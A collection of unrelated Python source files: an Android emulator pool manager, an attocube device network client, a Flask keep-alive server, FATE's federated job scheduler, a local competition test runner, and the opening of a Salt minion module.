nonlocal proc
nonlocal device_id
if proc.poll() is not None:
raise Exception(proc.stdout.read())
while await device.get_state_async(False) != Device.State.ONLINE:
if proc.poll() is not None:
raise Exception(proc.stdout.read())
await asyncio.sleep(1)
if proc.poll() is not None:
stdout, _ = proc.communicate()
raise Emulator.FailedBootError(port, stdout.decode('utf-8'))
start = time.time()
while not booted:
booted = device.get_system_property("sys.boot_completed") == "1"
await asyncio.sleep(1)
duration = time.time() - start
log.debug(f">>> {device.device_id} [{duration}] Booted?: {booted}")
await asyncio.wait_for(wait_for_boot(), config.boot_timeout)
Emulator._launches[device_id] = (avd, port, config, list(args), environ)
return Emulator(device_id)
except Exception as e:
raise Emulator.FailedBootError(port, str(e)) from e
finally:
if not booted:
with suppress(Exception):
proc.kill()
def kill(self) -> None:
"""
Kill this emulator (underlying Process)
"""
log.debug(f">>>>> Killing emulator {self.device_id}")
self.execute_remote_cmd("emu", "kill")
class EmulatorQueue:
def __init__(self, count: int):
"""
:param count: how many emulators to launch and put in the queue
"""
if count > len(Emulator.PORTS):
raise Exception(f"Can have at most {count} emulators at one time")
self._count = count
self._q: Queue["Emulator"] = Queue(count)
self._restart_q: Queue[Optional["Emulator"]] = Queue()
self._process: Optional[Process] = None
async def start_async(self, avd: str, config: EmulatorBundleConfiguration, *args: str) -> None:
"""
Asynchronous start: launch the emulators and keep servicing restart requests until stopped
:param avd: name of avd to launch
:param config: emulator bundle config
:param args: additional arguments to pass to the emulator launch command
"""
emulators = []
async def launch_next(index: int, *args: Any, **kargs: Any) -> Emulator:
await asyncio.sleep(index*3) # space out launches as this can help with avoiding instability
return await Emulator.launch(*args, **kargs)
async def launch(count: int) -> int:
emulator_launches: Union[Set[asyncio.Future[Emulator]],
Set[Coroutine[Any, Any, Any]]] = set(
launch_next(index, port, avd, config, *args) for index, port in enumerate(Emulator.PORTS[:count]))
failed_count = 0
pending = emulator_launches
while pending:
completed, pending = await asyncio.wait(pending, return_when=asyncio.FIRST_COMPLETED)
for emulator_task in completed:
    try:
        emulator = emulator_task.result()
    except Emulator.FailedBootError:
        # result() re-raises a failed launch; count it so the retry below can run
        failed_count += 1
        continue
    self._q.put(emulator)
    emulators.append(emulator)
return failed_count
failed = await launch(self._count)
if failed != 0 and emulators:
# retry the failed count of emulators
failed = await launch(failed)
if failed != 0:
for em in emulators:
em.kill()
raise Exception("Failed to boot all emulators")
while True:
emulator: Optional[Emulator] = self._restart_q.get()
if emulator is not None:
await emulator.restart()
else:
break # None signal end
for emulator in emulators:
emulator.kill()
self._q.close()
self._restart_q.close()
log.debug(">>>> Exiting emulator queue task")
def __enter__(self) -> "EmulatorQueue":
return self
def __exit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:
with suppress(Exception):
self.stop()
def stop(self) -> None:
"""
Stop the background process monitoring emulators and stop each emulator
"""
if self._process:
self._restart_q.put(None) # signals end
self._process.join(timeout=10)
with suppress(Exception):
self._q.close()
self._restart_q.close()
def relinquish(self, emulator: Emulator) -> None:
"""
Relinquish emulator back to the queue
:param emulator: emulator to relinquish
"""
self._q.put(emulator)
def reserve(self, timeout: Optional[float] = None) -> Emulator:
"""
reserve an emulator, blocking until the next one is available if necessary
:param timeout: maximum time to wait, in seconds
:return: the requested emulator
"""
emulator: Emulator = self._q.get(timeout=timeout)
while not emulator.is_alive():
self._restart_q.put(emulator)
emulator = self._q.get(timeout=timeout)
return emulator
@classmethod
def start(cls, count: int, avd: str, config: EmulatorBundleConfiguration, *args: str) -> "EmulatorQueue":
"""
Start the given number of emulators with the given avd and bundle configuration.
Launches emulators in the background and returns quickly. The retrieve command will
block on a Queue until the first emulator is booted and available from the background
process launching the emulators.
:param count: number of emulators to start
:param avd: name of avd to start
:param config: emulator configuration bundle
:param args: Additional arguments that will be passed when launching each emulator
:return: the queue for retrieving/relinquishing emulators
"""
def entry_point(avd: str, config: EmulatorBundleConfiguration, queue: EmulatorQueue) -> None:
asyncio.get_event_loop().run_until_complete(queue.start_async(avd, config, *args))
queue = EmulatorQueue(count)
queue._process = Process(target=entry_point, args=(avd, config, queue))
queue._process.start()
return queue
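# A hedged usage sketch of the queue API above; the SDK path and AVD name are placeholders.
if __name__ == "__main__":
    config = EmulatorBundleConfiguration(sdk=Path("/path/to/android/sdk"))  # placeholder path
    queue = EmulatorQueue.start(2, "my_avd", config)  # placeholder AVD name
    try:
        emulator = queue.reserve(timeout=10 * 60)  # blocks until the first emulator boots
        # ... run work against `emulator` here ...
        queue.relinquish(emulator)
    finally:
        queue.stop()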
|
ACS.py
|
# -*- coding: utf-8 -*-
import sys
import socket
import json
from time import time, sleep
from random import randint
from threading import Thread, Lock
try:
import netifaces
except:
pass
import urllib.request
import xml.dom.minidom as minidom
class AttoException(Exception):
def __init__(self, errorText = None, errorNumber = 0):
self.errorText = errorText
self.errorNumber = errorNumber
class Device(object):
TCP_PORT = 9090
is_open = False
request_id = randint(0, 1000000)
request_id_lock = Lock()
response_buffer = {}
def __init__(self, address):
self.address = address
self.language = 0
self.apiversion = 2
self.response_lock = Lock()
def __del__(self):
self.close()
def connect(self):
"""
Initializes and connects the selected AMC device.
"""
if not self.is_open:
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.settimeout(10)
tcp.connect((self.address, self.TCP_PORT))
self.tcp = tcp
if sys.version_info[0] > 2:
self.bufferedSocket = tcp.makefile("rw", newline='\r\n')
else:
self.bufferedSocket = tcp.makefile("rw")
self.is_open = True
def close(self):
"""
Closes the connection to the device.
Returns
-------
"""
if self.is_open:
self.bufferedSocket.close()
self.tcp.close()
self.is_open = False
def sendRequest(self, method, params=False):
req = {
"jsonrpc": "2.0",
"method": method,
"api": self.apiversion
}
if params:
req["params"] = params
with Device.request_id_lock:
req["id"] = Device.request_id
self.bufferedSocket.write(json.dumps(req))
self.bufferedSocket.flush()
Device.request_id = Device.request_id + 1
return req["id"]
def getResponse(self, request_id):
start_time = time()
while True:
if request_id in self.response_buffer:
response = self.response_buffer[request_id]
del self.response_buffer[request_id]
return response
if time() - start_time > 10:
raise TimeoutError("No result")
# Only one thread is allowed to read buffer
# Otherwise, deadlock is possible
if self.response_lock.acquire(blocking=False):
try:
response = self.bufferedSocket.readline()
parsed = json.loads(response)
if parsed["id"] == request_id:
return parsed
else:
self.response_buffer[parsed["id"]] = parsed
finally:
self.response_lock.release()
else:
# Sleep to unblock scheduler
sleep(0.01)
def request(self,method,params=False):
""" Synchronous request.
"""
if not self.is_open:
raise AttoException("not connected, use connect()");
request_id = self.sendRequest(method, params)
return self.getResponse(request_id)
def printError(self, errorNumber):
""" Converts the errorNumber into an error string an prints it to the
console.
Parameters
----------
errorNumber : int
"""
print("Error! " + str(self.system_service.errorNumberToString(self.language, errorNumber)[1]))
def handleError(self, response, ignoreFunctionError=False):
if response.get('error', False):
raise AttoException("JSON error in %s" % response['error'])
errNo = response['result'][0]
if (errNo != 0 and errNo != 'null' and not ignoreFunctionError):
raise AttoException(("Error! " + str(self.system_service.errorNumberToString(self.language ,errNo))), errNo)
return errNo
@staticmethod
def discover(device_type):
try:
network_ifaces = netifaces.interfaces()
except NameError:
print("Install netifaces for discovery")
print("Python:")
print("pip install netifaces")
print("\nPython3:")
print("pip3 install netifaces")
return {}
msg = \
'M-SEARCH * HTTP/1.1\r\n' \
'HOST:239.255.255.250:1900\r\n' \
'ST:urn:schemas-attocube-com:device:' + str(device_type) + ':1\r\n' \
'MX:2\r\n' \
'MAN:"ssdp:discover"\r\n' \
'\r\n'
def send_and_recv(iface, devices, devices_lock):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.bind((iface, 0))
s.settimeout(2)
s.sendto(str.encode(msg), ('239.255.255.250', 1900))
try:
while True:
_, addr = s.recvfrom(65507)
with devices_lock:
devices.append(addr[0])
except socket.timeout:
pass
thread_pool = []
devices = []
devices_lock = Lock()
for iface in network_ifaces:
addr = netifaces.ifaddresses(iface)
if netifaces.AF_INET not in addr:
continue
for ip in addr[netifaces.AF_INET]:
if "addr" not in ip:
continue
thread_pool.append(Thread(target=send_and_recv, args=(ip["addr"], devices, devices_lock)))
thread_pool[-1].start()
for thread in thread_pool:
thread.join()
def getElementData(xmlNode, tag):
tagNodes = xmlNode.getElementsByTagName(tag)
if len(tagNodes) == 0:
return None
childNodes = tagNodes[0].childNodes
if len(childNodes) == 0:
return None
return childNodes[0].data
deviceInfos = {}
for ip in devices:
try:
location = "http://" + ip + ":49000/upnp.xml"
response = urllib.request.urlopen(location)
response = response.read()
xmlNode = minidom.parseString(response)
serialNumber = getElementData(xmlNode, 'serialNumber')
ipAddress = getElementData(xmlNode, 'ipAddress')
macAddress = getElementData(xmlNode, 'macAddress')
friendlyName = getElementData(xmlNode, 'friendlyName')
modelName = getElementData(xmlNode, 'modelName')
lockedStatus = getElementData(xmlNode, 'lockedStatus')
deviceInfos[ip] = (
serialNumber,
ipAddress,
macAddress,
friendlyName,
modelName,
lockedStatus
)
except:
pass
return deviceInfos
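# A hedged usage sketch; the IP address and RPC method name below are placeholders, not a
# documented attocube endpoint.
if __name__ == "__main__":
    dev = Device("192.168.1.1")  # placeholder device address
    dev.connect()
    try:
        response = dev.request("com.example.some.method")  # placeholder JSON-RPC method
        print(response)
    finally:
        dev.close()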
|
keepalive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Script running successfully"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
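# A minimal usage sketch (assumption: this module is imported by a long-running bot or
# worker script): keep_alive() serves "/" on port 8080 from a background thread so an
# external uptime monitor can ping it while the main work continues.
if __name__ == "__main__":
    keep_alive()
    import time
    while True:
        time.sleep(60)  # stand-in for the real long-running work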
|
federated_scheduler.py
|
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from fate_arch.common import base_utils
from fate_flow.utils.api_utils import federated_api
from fate_flow.utils.log_utils import start_log, failed_log, successful_log
from fate_flow.utils.log_utils import schedule_logger
from fate_flow.entity import RetCode
from fate_flow.entity.run_status import FederatedSchedulingStatusCode
from fate_flow.entity.types import ResourceOperation
from fate_flow.db.db_models import Job, Task
from fate_flow.operation.job_saver import JobSaver
import threading
class FederatedScheduler(object):
"""
Send commands to party,
Report info to initiator
"""
# Task
REPORT_TO_INITIATOR_FIELDS = ["party_status", "start_time", "update_time", "end_time", "elapsed"]
# Job
@classmethod
def create_job(cls, job: Job):
return cls.job_command(job=job, command="create", command_body=job.to_human_model_dict(), parallel=False)
@classmethod
def update_parameter(cls, job: Job, updated_parameters):
return cls.job_command(job=job, command="parameter/update", command_body=updated_parameters, parallel=False)
@classmethod
def resource_for_job(cls, job, operation_type: ResourceOperation, specific_dest=None):
schedule_logger(job.f_job_id).info(f"try to {operation_type} job resource")
status_code, response = cls.job_command(job=job, command=f"resource/{operation_type.value}", specific_dest=specific_dest)
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info(f"{operation_type} job resource successfully")
else:
schedule_logger(job.f_job_id).info(f"{operation_type} job resource failed")
return status_code, response
@classmethod
def dependence_for_job(cls, job, specific_dest=None):
schedule_logger(job.f_job_id).info(f"try to check job dependence")
status_code, response = cls.job_command(job=job, command=f"dependence/check", specific_dest=specific_dest)
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info(f"check job dependence successfully")
else:
schedule_logger(job.f_job_id).info(f"check job dependence failed")
return status_code, response
@classmethod
def start_job(cls, job, command_body=None):
return cls.job_command(job=job, command="start", command_body=command_body)
@classmethod
def align_args(cls, job, command_body):
return cls.job_command(job=job, command="align", command_body=command_body)
@classmethod
def sync_job(cls, job, update_fields):
sync_info = job.to_human_model_dict(only_primary_with=update_fields)
schedule_logger(job.f_job_id).info("sync job info to all party")
status_code, response = cls.job_command(job=job, command="update", command_body=sync_info)
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info("sync job info to all party successfully")
else:
schedule_logger(job.f_job_id).info(f"sync job info to all party failed: \n{response}")
return status_code, response
@classmethod
def sync_job_status(cls, job):
schedule_logger(job.f_job_id).info(f"job is {job.f_status}, sync to all party")
status_code, response = cls.job_command(job=job, command=f"status/{job.f_status}", command_body=job.to_human_model_dict())
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info(f"sync job status {job.f_status} to all party success")
else:
schedule_logger(job.f_job_id).info(f"sync job status {job.f_status} to all party failed: \n{response}")
return status_code, response
@classmethod
def save_pipelined_model(cls, job):
schedule_logger(job.f_job_id).info("try to save job pipelined model")
status_code, response = cls.job_command(job=job, command="model")
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info("save job pipelined model success")
else:
schedule_logger(job.f_job_id).info(f"save job pipelined model failed:\n{response}")
return status_code, response
@classmethod
def stop_job(cls, job, stop_status):
schedule_logger(job.f_job_id).info("try to stop job")
job.f_status = stop_status
status_code, response = cls.job_command(job=job, command="stop/{}".format(stop_status))
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info("stop job success")
else:
schedule_logger(job.f_job_id).info(f"stop job failed:\n{response}")
return status_code, response
@classmethod
def request_stop_job(cls, job, stop_status, command_body=None):
return cls.job_command(job=job, command="stop/{}".format(stop_status), dest_only_initiator=True, command_body=command_body)
@classmethod
def request_rerun_job(cls, job, command_body):
return cls.job_command(job=job, command="rerun", command_body=command_body, dest_only_initiator=True)
@classmethod
def clean_job(cls, job):
schedule_logger(job.f_job_id).info("try to clean job")
status_code, response = cls.job_command(job=job, command="clean", command_body=job.f_runtime_conf_on_party["role"].copy())
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info("clean job success")
else:
schedule_logger(job.f_job_id).info(f"clean job failed:\n{response}")
return status_code, response
@classmethod
def job_command(cls, job, command, command_body=None, dest_only_initiator=False, specific_dest=None, parallel=False):
federated_response = {}
job_parameters = job.f_runtime_conf_on_party["job_parameters"]
if dest_only_initiator:
dest_partis = [(job.f_initiator_role, [job.f_initiator_party_id])]
api_type = "initiator"
elif specific_dest:
dest_partis = specific_dest.items()
api_type = "party"
else:
dest_partis = job.f_roles.items()
api_type = "party"
threads = []
for dest_role, dest_party_ids in dest_partis:
federated_response[dest_role] = {}
for dest_party_id in dest_party_ids:
endpoint = f"/{api_type}/{job.f_job_id}/{dest_role}/{dest_party_id}/{command}"
args = (job.f_job_id, job.f_role, job.f_party_id, dest_role, dest_party_id, endpoint, command_body, job_parameters["federated_mode"], federated_response)
if parallel:
t = threading.Thread(target=cls.federated_command, args=args)
threads.append(t)
t.start()
else:
cls.federated_command(*args)
for thread in threads:
thread.join()
return cls.return_federated_response(federated_response=federated_response)
@classmethod
def create_task(cls, job, task):
return cls.task_command(job=job, task=task, command="create", command_body=task.to_human_model_dict())
@classmethod
def start_task(cls, job, task):
return cls.task_command(job=job, task=task, command="start", command_body={}, need_user=True)
@classmethod
def collect_task(cls, job, task):
return cls.task_command(job=job, task=task, command="collect")
@classmethod
def sync_task(cls, job, task, update_fields):
sync_info = task.to_human_model_dict(only_primary_with=update_fields)
schedule_logger(task.f_job_id).info("sync task {} {} info to all party".format(task.f_task_id, task.f_task_version))
status_code, response = cls.task_command(job=job, task=task, command="update", command_body=sync_info)
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(task.f_job_id).info("sync task {} {} info to all party successfully".format(task.f_task_id, task.f_task_version))
else:
schedule_logger(task.f_job_id).info("sync task {} {} info to all party failed: \n{}".format(task.f_task_id, task.f_task_version, response))
return status_code, response
@classmethod
def sync_task_status(cls, job, task):
schedule_logger(task.f_job_id).info("task {} {} is {}, sync to all party".format(task.f_task_id, task.f_task_version, task.f_status))
status_code, response = cls.task_command(job=job, task=task, command=f"status/{task.f_status}")
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(task.f_job_id).info("sync task {} {} status {} to all party success".format(task.f_task_id, task.f_task_version, task.f_status))
else:
schedule_logger(task.f_job_id).info("sync task {} {} status {} to all party failed: \n{}".format(task.f_task_id, task.f_task_version, task.f_status, response))
return status_code, response
@classmethod
def stop_task(cls, job, task, stop_status):
schedule_logger(task.f_job_id).info("try to stop task {} {}".format(task.f_task_id, task.f_task_version))
task.f_status = stop_status
status_code, response = cls.task_command(job=job, task=task, command="stop/{}".format(stop_status))
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info("stop task {} {} success".format(task.f_task_id, task.f_task_version))
else:
schedule_logger(job.f_job_id).info("stop task {} {} failed:\n{}".format(task.f_task_id, task.f_task_version, response))
return status_code, response
@classmethod
def clean_task(cls, job, task, content_type):
schedule_logger(task.f_job_id).info("try to clean task {} {} {}".format(task.f_task_id, task.f_task_version, content_type))
status_code, response = cls.task_command(job=job, task=task, command="clean/{}".format(content_type))
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info("clean task {} {} {} successfully".format(task.f_task_id, task.f_task_version, content_type))
else:
schedule_logger(job.f_job_id).info("clean task {} {} {} failed:\n{}".format(task.f_task_id, task.f_task_version, content_type, response))
return status_code, response
@classmethod
def task_command(cls, job: Job, task: Task, command, command_body=None, parallel=False, need_user=False):
msg = f"execute federated task {task.f_component_name} command({command})"
federated_response = {}
job_parameters = job.f_runtime_conf_on_party["job_parameters"]
tasks = JobSaver.query_task(task_id=task.f_task_id, only_latest=True)
threads = []
for task in tasks:
dest_role, dest_party_id = task.f_role, task.f_party_id
federated_response[dest_role] = federated_response.get(dest_role, {})
endpoint = f"/party/{task.f_job_id}/{task.f_component_name}/{task.f_task_id}/{task.f_task_version}/{dest_role}/{dest_party_id}/{command}"
if need_user:
command_body["user_id"] = job.f_user.get(dest_role, {}).get(str(dest_party_id), "")
schedule_logger(job.f_job_id).info(f'user:{job.f_user}, dest_role:{dest_role}, dest_party_id:{dest_party_id}')
schedule_logger(job.f_job_id).info(f'command_body: {command_body}')
args = (job.f_job_id, job.f_role, job.f_party_id, dest_role, dest_party_id, endpoint, command_body, job_parameters["federated_mode"], federated_response)
if parallel:
t = threading.Thread(target=cls.federated_command, args=args)
threads.append(t)
t.start()
else:
cls.federated_command(*args)
for thread in threads:
thread.join()
status_code, response = cls.return_federated_response(federated_response=federated_response)
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info(successful_log(msg))
else:
schedule_logger(job.f_job_id).error(failed_log(msg, detail=response))
return status_code, response
@classmethod
def federated_command(cls, job_id, src_role, src_party_id, dest_role, dest_party_id, endpoint, body, federated_mode, federated_response):
st = base_utils.current_timestamp()
schedule_logger(job_id).info(f"start sending {endpoint} federated command")
try:
response = federated_api(job_id=job_id,
method='POST',
endpoint=endpoint,
src_role=src_role,
src_party_id=src_party_id,
dest_party_id=dest_party_id,
json_body=body if body else {},
federated_mode=federated_mode)
except Exception as e:
schedule_logger(job_id=job_id).exception(e)
response = {
"retcode": RetCode.FEDERATED_ERROR,
"retmsg": "Federated schedule error, {}".format(e)
}
if response["retcode"] != RetCode.SUCCESS:
schedule_logger(job_id=job_id).warning("an error occurred while {} the job to role {} party {}: \n{}".format(
endpoint,
dest_role,
dest_party_id,
response["retmsg"]
))
federated_response[dest_role][dest_party_id] = response
et = base_utils.current_timestamp()
schedule_logger(job_id).info(f"send {endpoint} federated command use {et - st} ms")
@classmethod
def report_task_to_initiator(cls, task: Task):
"""
:param task:
:return:
"""
if task.f_role != task.f_initiator_role and task.f_party_id != task.f_initiator_party_id:
try:
response = federated_api(job_id=task.f_job_id,
method='POST',
endpoint='/initiator/{}/{}/{}/{}/{}/{}/report'.format(
task.f_job_id,
task.f_component_name,
task.f_task_id,
task.f_task_version,
task.f_role,
task.f_party_id),
src_party_id=task.f_party_id,
dest_party_id=task.f_initiator_party_id,
src_role=task.f_role,
json_body=task.to_human_model_dict(only_primary_with=cls.REPORT_TO_INITIATOR_FIELDS),
federated_mode=task.f_federated_mode)
except Exception as e:
schedule_logger(task.f_job_id).error(f"report task to initiator error: {e}")
return False
if response["retcode"] != RetCode.SUCCESS:
retmsg = response["retmsg"]
schedule_logger(task.f_job_id).error(f"report task to initiator error: {retmsg}")
return False
else:
return True
else:
return False
@classmethod
def tracker_command(cls, job, request_data, command, json_body=None):
job_parameters = job.f_runtime_conf_on_party["job_parameters"]
response = federated_api(job_id=str(request_data['job_id']),
method='POST',
endpoint='/tracker/{}/{}/{}/{}/{}'.format(
request_data['job_id'],
request_data['component_name'],
request_data['role'],
request_data['party_id'],
command),
src_party_id=job.f_party_id,
dest_party_id=request_data['party_id'],
src_role=job.f_role,
json_body=json_body if json_body else {},
federated_mode=job_parameters["federated_mode"])
return response
# Utils
@classmethod
def return_federated_response(cls, federated_response):
retcode_set = set()
for dest_role in federated_response.keys():
for party_id in federated_response[dest_role].keys():
retcode_set.add(federated_response[dest_role][party_id]["retcode"])
if len(retcode_set) == 1 and RetCode.SUCCESS in retcode_set:
federated_scheduling_status_code = FederatedSchedulingStatusCode.SUCCESS
elif RetCode.EXCEPTION_ERROR in retcode_set:
federated_scheduling_status_code = FederatedSchedulingStatusCode.ERROR
elif RetCode.SUCCESS in retcode_set:
federated_scheduling_status_code = FederatedSchedulingStatusCode.PARTIAL
else:
federated_scheduling_status_code = FederatedSchedulingStatusCode.FAILED
return federated_scheduling_status_code, federated_response
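# A hedged illustration of the fan-out performed by job_command()/task_command(): for a job
# command such as "stop/canceled", every destination party receives a POST (via
# federated_command -> federated_api) to
#   /party/<job_id>/<dest_role>/<dest_party_id>/stop/canceled
# and return_federated_response() folds the per-party retcodes into a single
# FederatedSchedulingStatusCode (SUCCESS / PARTIAL / ERROR / FAILED).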
|
run_local_test.py
|
"""run local test in starting kit"""
# pylint: disable=logging-fstring-interpolation
import argparse
import logging
import os
from os.path import join, isdir
import shutil
from multiprocessing import Process
VERBOSITY_LEVEL = 'WARNING'
logging.basicConfig(
level=getattr(logging, VERBOSITY_LEVEL),
format='%(asctime)s %(levelname)s %(filename)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
)
def _here(*args):
here = os.path.dirname(os.path.realpath(__file__))
return os.path.join(here, *args)
def _ingestion_program(starting_kit_dir):
return join(starting_kit_dir, 'ingestion', 'ingestion.py')
def _scoring_program(starting_kit_dir):
return join(starting_kit_dir, 'scoring', 'score.py')
def remove_dir(output_dir):
"""Remove the directory `output_dir`.
This aims to clean existing output of last run of local test.
"""
if isdir(output_dir):
logging.info(
f"Cleaning existing output directory of last run: {output_dir}")
shutil.rmtree(output_dir)
def _clean(starting_kit_dir):
ingestion_output_dir = join(starting_kit_dir, 'sample_result_submission')
score_dir = os.path.join(starting_kit_dir, 'scoring_output')
remove_dir(ingestion_output_dir)
remove_dir(score_dir)
def run(dataset_dir, code_dir, seed):
"""run"""
# Current directory containing this script
starting_kit_dir = _here()
path_ingestion = _ingestion_program(starting_kit_dir)
path_scoring = _scoring_program(starting_kit_dir)
# Run ingestion and scoring at the same time
command_ingestion = (
'python '
# f'{path_ingestion} --dataset_dir={dataset_dir}/data '
f'{path_ingestion} --dataset_dir={dataset_dir}/train.data'
f' --code_dir={code_dir}'
f' --seed={seed}')
command_scoring = (
# f'python {path_scoring} --solution_dir={dataset_dir}/solution')
f'python {path_scoring} --solution_dir={dataset_dir}')
def run_ingestion():
os.system(command_ingestion)
def run_scoring():
os.system(command_scoring)
ingestion_process = Process(name='ingestion', target=run_ingestion)
scoring_process = Process(name='scoring', target=run_scoring)
_clean(starting_kit_dir)
ingestion_process.start()
scoring_process.start()
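# Editorial note: run() starts ingestion and scoring as two concurrent
# processes and returns without joining them; the script exits only once both
# children have finished on their own. A caller that needs to block until
# completion could keep the process handles and call .join() on each
# (not done in this script).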
def _parse_args():
default_starting_kit_dir = _here()
default_dataset_dir = join(default_starting_kit_dir, 'data', 'demo')
default_code_dir = join(default_starting_kit_dir, 'code_submission')
parser = argparse.ArgumentParser()
parser.add_argument('--dataset_dir', type=str,
default=default_dataset_dir,
help="Directory storing the dataset, should contain"
"'data' and 'solution'")
parser.add_argument('--code_dir', type=str,
default=default_code_dir,
help="Directory storing the submission code "
"`model.py` and other necessary packages.")
parser.add_argument('--seed', type=int,
default=1234,
help="seed used for all packages")
args = parser.parse_args()
return args
def main():
"""main entry"""
args = _parse_args()
dataset_dir = args.dataset_dir
code_dir = args.code_dir
seed = args.seed
logging.info("#" * 50)
logging.info("Begin running local test using")
logging.info(f"code_dir = {code_dir}")
logging.info(f"dataset_dir = {dataset_dir}")
logging.info(f"seed = {seed}")
logging.info("#" * 50)
run(dataset_dir, code_dir, seed)
if __name__ == '__main__':
main()
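# Example invocation (editorial sketch; the paths are the argparse defaults above):
#     python run_local_test.py --dataset_dir=./data/demo \
#         --code_dir=./code_submission --seed=1234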
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import
from __future__ import print_function
import copy
import errno
import fnmatch
import hashlib
import logging
import multiprocessing
import os
import re
import salt
import signal
import sys
import threading
import time
import traceback
import types
from random import randint, shuffle
from salt.ext.six.moves import range
# Import third party libs
try:
import zmq
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
# Import salt libs
from salt.exceptions import (
AuthenticationError, CommandExecutionError, CommandNotFoundError,
SaltInvocationError, SaltReqTimeoutError, SaltClientError,
SaltSystemExit, SaltSyndicMasterError
)
import salt.client
import salt.crypt
import salt.loader
import salt.payload
import salt.utils
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.ext.six import string_types
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
import salt.syspaths
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
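# Editorial sketch (not part of the original source): the numbered steps above
# correspond roughly to this minimal programmatic lifecycle. The config path is
# a placeholder, and this helper is never called at import time.
def _example_minion_lifecycle(config_path='/etc/salt/minion'):
    opts = salt.config.minion_config(config_path)  # 1. read in the configuration
    minion = Minion(opts)  # 2-5. generate functions, authenticate, connect
    minion.tune_in()       # 6. handle publications (blocks in the event loop)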
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
            err = 'Master address: {0} could not be resolved. Invalid or unresolvable address.'.format(
opts.get('master', 'Unknown'))
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
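# Editorial example (values are hypothetical): with opts containing
# {'master': 'salt.example.com', 'master_port': 4506, 'ipv6': False, ...},
# resolve_dns() returns something like
# {'master_ip': '203.0.113.10', 'master_uri': 'tcp://203.0.113.10:4506'},
# falling back to 127.0.0.1 when DNS checking is skipped for a local file_client.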
def get_proc_dir(cachedir):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
'''
fn_ = os.path.join(cachedir, 'proc')
if not os.path.isdir(fn_):
# proc_dir is not present, create it
os.makedirs(fn_)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
